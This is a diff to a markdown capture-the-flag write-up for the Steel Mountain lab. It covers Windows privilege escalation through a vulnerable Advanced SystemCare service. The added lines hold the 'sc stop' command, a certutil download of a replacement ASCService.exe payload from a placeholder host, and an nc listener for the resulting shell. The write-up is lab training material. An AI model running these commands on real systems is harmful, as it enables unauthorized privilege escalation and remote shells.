Sgt-Hartmann/Write-ups/Steel Mountain Write-up.md

 And as predicted, winpeas found our ASC privesc vuln.

-Now we will use certutil again to download and substitute the original ASCService.exe with our payload, after we have stopped the service:
+Now we will use `certutil` again to download and substitute the original ASCService.exe with our payload, after we have stopped the service: `sc stop AdvancedSystemCareService9`
 ![](https://github.com/user-attachments/assets/1fd7e1ac-05a2-4f1d-ad3a-4db7a64d9a0d)

+`certutil -f -split -urlcache http://<IP>:<PORT>/ASCService.exe ASCService.exe`
 ![](https://github.com/user-attachments/assets/cc6d0c75-c85d-41ee-be42-c521a5e6e027)

 In another terminal, fire up `nc -lvnp <PORT>` and finally, by restarting the service we will own our root shell.